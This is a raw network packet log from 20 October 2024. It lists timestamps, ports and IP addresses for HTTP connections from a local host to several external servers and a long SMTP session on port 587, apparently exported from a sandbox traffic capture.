Oct 20, 2024 18:42:53.520263910 CEST	50070	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:53.521321058 CEST	50070	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:53.521354914 CEST	50070	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:53.526288033 CEST	80	50070	44.213.104.86	192.168.2.4
Oct 20, 2024 18:42:53.526721001 CEST	80	50070	44.213.104.86	192.168.2.4
Oct 20, 2024 18:42:54.025885105 CEST	50075	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:42:54.030960083 CEST	80	50075	47.129.31.212	192.168.2.4
Oct 20, 2024 18:42:54.031023026 CEST	50075	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:42:54.031164885 CEST	50075	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:42:54.031193018 CEST	50075	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:42:54.036149979 CEST	80	50075	47.129.31.212	192.168.2.4
Oct 20, 2024 18:42:54.036375999 CEST	80	50075	47.129.31.212	192.168.2.4
Oct 20, 2024 18:42:54.465753078 CEST	80	50070	44.213.104.86	192.168.2.4
Oct 20, 2024 18:42:54.465817928 CEST	50070	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:54.466145039 CEST	50070	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:54.471007109 CEST	50076	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:54.471079111 CEST	80	50070	44.213.104.86	192.168.2.4
Oct 20, 2024 18:42:54.476762056 CEST	80	50076	44.213.104.86	192.168.2.4
Oct 20, 2024 18:42:54.476835012 CEST	50076	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:54.477004051 CEST	50076	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:54.477035999 CEST	50076	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:54.481884956 CEST	80	50076	44.213.104.86	192.168.2.4
Oct 20, 2024 18:42:54.481936932 CEST	80	50076	44.213.104.86	192.168.2.4
Oct 20, 2024 18:42:55.354207039 CEST	80	50076	44.213.104.86	192.168.2.4
Oct 20, 2024 18:42:55.354367971 CEST	50076	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:55.354566097 CEST	50076	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:55.360397100 CEST	80	50076	44.213.104.86	192.168.2.4
Oct 20, 2024 18:42:55.373780966 CEST	50082	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:55.379594088 CEST	80	50082	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:55.383100986 CEST	50082	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:55.383100986 CEST	50082	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:55.385313034 CEST	50082	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:55.389239073 CEST	80	50082	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:55.391300917 CEST	80	50082	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:55.584883928 CEST	80	50075	47.129.31.212	192.168.2.4
Oct 20, 2024 18:42:55.587009907 CEST	50075	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:42:55.587009907 CEST	50075	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:42:55.592573881 CEST	80	50075	47.129.31.212	192.168.2.4
Oct 20, 2024 18:42:55.682519913 CEST	50083	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:42:55.688831091 CEST	80	50083	47.129.31.212	192.168.2.4
Oct 20, 2024 18:42:55.689086914 CEST	50083	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:42:55.692539930 CEST	50083	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:42:55.692581892 CEST	50083	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:42:55.697439909 CEST	80	50083	47.129.31.212	192.168.2.4
Oct 20, 2024 18:42:55.697833061 CEST	80	50083	47.129.31.212	192.168.2.4
Oct 20, 2024 18:42:56.279628992 CEST	80	50082	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:56.279709101 CEST	50082	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:56.431171894 CEST	50082	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:56.436096907 CEST	80	50082	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:56.437378883 CEST	50085	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:56.442358971 CEST	80	50085	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:56.442424059 CEST	50085	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:56.447575092 CEST	50085	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:56.447575092 CEST	50085	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:56.452811003 CEST	80	50085	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:56.452846050 CEST	80	50085	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:56.969274998 CEST	50083	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:42:57.347127914 CEST	80	50085	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:57.347203016 CEST	50085	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:57.349127054 CEST	50085	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:57.353980064 CEST	80	50085	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:57.369901896 CEST	50090	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:57.375179052 CEST	80	50090	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:57.378801107 CEST	50090	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:57.379013062 CEST	50090	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:57.379045963 CEST	50090	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:57.383992910 CEST	80	50090	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:57.384062052 CEST	80	50090	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:57.689491987 CEST	50095	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:57.694391012 CEST	80	50095	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:57.694458961 CEST	50095	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:57.697318077 CEST	50095	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:57.697364092 CEST	50095	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:57.702563047 CEST	80	50095	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:57.702593088 CEST	80	50095	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:58.890130997 CEST	80	50090	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:58.891113997 CEST	50090	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:58.891225100 CEST	50090	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:58.893255949 CEST	50101	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:58.898889065 CEST	80	50090	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:58.899028063 CEST	80	50101	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:58.902978897 CEST	50101	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:58.903075933 CEST	50101	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:58.903090000 CEST	50101	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:58.908762932 CEST	80	50101	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:58.908907890 CEST	80	50101	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:59.215488911 CEST	80	50095	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:59.215543032 CEST	50095	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:59.215600967 CEST	50095	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:59.220416069 CEST	80	50095	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:59.363215923 CEST	50103	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:59.368069887 CEST	80	50103	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:59.368150949 CEST	50103	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:59.368331909 CEST	50103	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:59.368364096 CEST	50103	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:59.373152018 CEST	80	50103	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:59.373560905 CEST	80	50103	13.251.16.150	192.168.2.4
Oct 20, 2024 18:43:00.439366102 CEST	80	50101	13.251.16.150	192.168.2.4
Oct 20, 2024 18:43:00.439477921 CEST	50101	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:43:00.444052935 CEST	50101	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:43:00.449928045 CEST	80	50101	13.251.16.150	192.168.2.4
Oct 20, 2024 18:43:00.459331989 CEST	50109	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:43:00.464611053 CEST	80	50109	13.251.16.150	192.168.2.4
Oct 20, 2024 18:43:00.466836929 CEST	50109	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:43:00.466962099 CEST	50109	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:43:00.466996908 CEST	50109	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:43:00.471832037 CEST	80	50109	13.251.16.150	192.168.2.4
Oct 20, 2024 18:43:00.471909046 CEST	80	50109	13.251.16.150	192.168.2.4
Oct 20, 2024 18:43:00.969302893 CEST	50103	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:43:01.102188110 CEST	80	50103	13.251.16.150	192.168.2.4
Oct 20, 2024 18:43:01.103365898 CEST	50103	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:43:02.008333921 CEST	50115	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:43:02.013323069 CEST	80	50115	34.211.97.45	192.168.2.4
Oct 20, 2024 18:43:02.015322924 CEST	50115	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:43:02.015450001 CEST	50115	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:43:02.016129971 CEST	50115	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:43:02.020201921 CEST	80	50115	34.211.97.45	192.168.2.4
Oct 20, 2024 18:43:02.020945072 CEST	80	50115	34.211.97.45	192.168.2.4
Oct 20, 2024 18:43:02.033921957 CEST	80	50109	13.251.16.150	192.168.2.4
Oct 20, 2024 18:43:02.035454035 CEST	50109	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:43:02.035526037 CEST	50109	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:43:02.037333012 CEST	50116	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:43:02.040400028 CEST	80	50109	13.251.16.150	192.168.2.4
Oct 20, 2024 18:43:02.042402983 CEST	80	50116	13.251.16.150	192.168.2.4
Oct 20, 2024 18:43:02.042479038 CEST	50116	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:43:02.043226957 CEST	50116	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:43:02.043240070 CEST	50116	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:43:02.048062086 CEST	80	50116	13.251.16.150	192.168.2.4
Oct 20, 2024 18:43:02.048207998 CEST	80	50116	13.251.16.150	192.168.2.4
Oct 20, 2024 18:43:03.518646002 CEST	49902	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:43:03.523921013 CEST	80	49902	208.100.26.245	192.168.2.4
Oct 20, 2024 18:43:03.523982048 CEST	49902	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:43:03.571201086 CEST	80	50116	13.251.16.150	192.168.2.4
Oct 20, 2024 18:43:03.571258068 CEST	50116	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:43:03.579112053 CEST	50116	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:43:03.583909035 CEST	80	50116	13.251.16.150	192.168.2.4
Oct 20, 2024 18:43:03.878411055 CEST	50125	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:43:03.883380890 CEST	80	50125	34.211.97.45	192.168.2.4
Oct 20, 2024 18:43:03.883939028 CEST	50125	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:43:03.885544062 CEST	50125	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:43:03.885556936 CEST	50125	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:43:03.890568018 CEST	80	50125	34.211.97.45	192.168.2.4
Oct 20, 2024 18:43:03.890651941 CEST	80	50125	34.211.97.45	192.168.2.4
Oct 20, 2024 18:43:03.963267088 CEST	80	50115	34.211.97.45	192.168.2.4
Oct 20, 2024 18:43:03.968889952 CEST	50115	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:43:03.974579096 CEST	80	50115	34.211.97.45	192.168.2.4
Oct 20, 2024 18:43:03.974632978 CEST	50115	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:43:04.326589108 CEST	50126	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:43:04.331453085 CEST	80	50126	3.94.10.34	192.168.2.4
Oct 20, 2024 18:43:04.331522942 CEST	50126	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:43:04.331859112 CEST	50126	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:43:04.331993103 CEST	50126	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:43:04.336724043 CEST	80	50126	3.94.10.34	192.168.2.4
Oct 20, 2024 18:43:04.336846113 CEST	80	50126	3.94.10.34	192.168.2.4
Oct 20, 2024 18:43:04.815924883 CEST	80	50125	34.211.97.45	192.168.2.4
Oct 20, 2024 18:43:04.822465897 CEST	50125	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:43:04.829353094 CEST	80	50125	34.211.97.45	192.168.2.4
Oct 20, 2024 18:43:04.830965996 CEST	50125	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:43:04.837218046 CEST	50128	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:43:04.843956947 CEST	80	50128	47.129.31.212	192.168.2.4
Oct 20, 2024 18:43:04.846991062 CEST	50128	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:43:04.847117901 CEST	50128	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:43:04.847146034 CEST	50128	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:43:04.853846073 CEST	80	50128	47.129.31.212	192.168.2.4
Oct 20, 2024 18:43:04.853861094 CEST	80	50128	47.129.31.212	192.168.2.4
Oct 20, 2024 18:43:05.218440056 CEST	80	50126	3.94.10.34	192.168.2.4
Oct 20, 2024 18:43:05.218514919 CEST	50126	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:43:05.219346046 CEST	50126	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:43:05.224771023 CEST	80	50126	3.94.10.34	192.168.2.4
Oct 20, 2024 18:43:05.245852947 CEST	50132	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:43:05.250788927 CEST	80	50132	3.94.10.34	192.168.2.4
Oct 20, 2024 18:43:05.250858068 CEST	50132	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:43:05.251046896 CEST	50132	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:43:05.251105070 CEST	50132	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:43:05.255914927 CEST	80	50132	3.94.10.34	192.168.2.4
Oct 20, 2024 18:43:05.255923986 CEST	80	50132	3.94.10.34	192.168.2.4
Oct 20, 2024 18:43:06.145545959 CEST	80	50132	3.94.10.34	192.168.2.4
Oct 20, 2024 18:43:06.145944118 CEST	50132	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:43:06.219856024 CEST	50132	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:43:06.224721909 CEST	80	50132	3.94.10.34	192.168.2.4
Oct 20, 2024 18:43:06.943748951 CEST	50138	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:43:06.948755026 CEST	80	50138	44.213.104.86	192.168.2.4
Oct 20, 2024 18:43:06.948829889 CEST	50138	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:43:06.948946953 CEST	50138	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:43:06.948975086 CEST	50138	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:43:06.953758955 CEST	80	50138	44.213.104.86	192.168.2.4
Oct 20, 2024 18:43:06.953851938 CEST	80	50138	44.213.104.86	192.168.2.4
Oct 20, 2024 18:43:07.445393085 CEST	80	50128	47.129.31.212	192.168.2.4
Oct 20, 2024 18:43:07.445585012 CEST	50128	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:43:07.458492994 CEST	50128	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:43:07.463469982 CEST	80	50128	47.129.31.212	192.168.2.4
Oct 20, 2024 18:43:07.466506004 CEST	50139	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:43:07.471447945 CEST	80	50139	47.129.31.212	192.168.2.4
Oct 20, 2024 18:43:07.472668886 CEST	50139	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:43:07.472863913 CEST	50139	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:43:07.472923994 CEST	50139	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:43:07.477813959 CEST	80	50139	47.129.31.212	192.168.2.4
Oct 20, 2024 18:43:07.477827072 CEST	80	50139	47.129.31.212	192.168.2.4
Oct 20, 2024 18:43:07.860892057 CEST	80	50138	44.213.104.86	192.168.2.4
Oct 20, 2024 18:43:07.861109018 CEST	50138	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:43:07.861201048 CEST	50138	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:43:07.866134882 CEST	80	50138	44.213.104.86	192.168.2.4
Oct 20, 2024 18:43:07.898861885 CEST	50145	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:43:07.903788090 CEST	80	50145	44.213.104.86	192.168.2.4
Oct 20, 2024 18:43:07.903915882 CEST	50145	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:43:07.904275894 CEST	50145	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:43:07.904345036 CEST	50145	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:43:07.909172058 CEST	80	50145	44.213.104.86	192.168.2.4
Oct 20, 2024 18:43:07.909390926 CEST	80	50145	44.213.104.86	192.168.2.4
Oct 20, 2024 18:43:08.507793903 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:08.512624979 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:08.821330070 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:08.821660995 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:08.821882963 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:08.828002930 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:08.828124046 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:09.087522030 CEST	80	50139	47.129.31.212	192.168.2.4
Oct 20, 2024 18:43:09.087966919 CEST	50139	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:43:09.088007927 CEST	50139	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:43:09.092928886 CEST	80	50139	47.129.31.212	192.168.2.4
Oct 20, 2024 18:43:09.275129080 CEST	80	50145	44.213.104.86	192.168.2.4
Oct 20, 2024 18:43:09.342045069 CEST	80	50145	44.213.104.86	192.168.2.4
Oct 20, 2024 18:43:09.342101097 CEST	50145	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:43:10.930025101 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:10.930206060 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:10.936369896 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:11.237327099 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:11.237539053 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:11.242415905 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:11.539371967 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:11.539652109 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:11.544540882 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:11.859366894 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:11.859703064 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:11.859719992 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:11.859751940 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:11.860511065 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:11.860557079 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:11.863190889 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:11.867993116 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:12.164904118 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:12.165524960 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:12.170557976 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:12.265424013 CEST	50145	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:43:12.270333052 CEST	80	50145	44.213.104.86	192.168.2.4
Oct 20, 2024 18:43:12.477874994 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:12.478032112 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:12.482961893 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:12.788678885 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:12.788938046 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:12.793724060 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:13.111646891 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:13.111799002 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:13.116669893 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:13.415504932 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:13.418330908 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:13.423245907 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:13.735495090 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:13.735665083 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:13.740546942 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.053962946 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.054490089 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.054605961 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.054632902 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.054689884 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.056809902 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.059303045 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.059361935 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.059362888 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.059375048 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.059551001 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.059597015 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.061979055 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.062025070 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.062027931 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.062035084 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.062047005 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.062069893 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.062092066 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.062092066 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.062100887 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.062117100 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.062124014 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.062133074 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.062141895 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.062155962 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.062195063 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.064218998 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.064265013 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.064416885 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.064465046 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.066924095 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.066975117 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.067008972 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.067018032 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.067049980 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.067070961 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.067101002 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.067101002 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.067104101 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.067162991 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.067187071 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.067244053 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.067248106 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.067257881 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.067270041 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.067296982 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.067321062 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.067337036 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.069175005 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.069240093 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.069283962 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.069341898 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.071911097 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.071976900 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.071981907 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.072012901 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.072036028 CEST	50146	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:43:14.072036028 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.072086096 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.072103977 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.072166920 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.072230101 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.072341919 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.072350979 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.072360039 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.072369099 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.072386980 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.072403908 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.072448969 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.072458029 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.072489023 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.072498083 CEST	587	50146	51.195.88.199	192.168.2.4
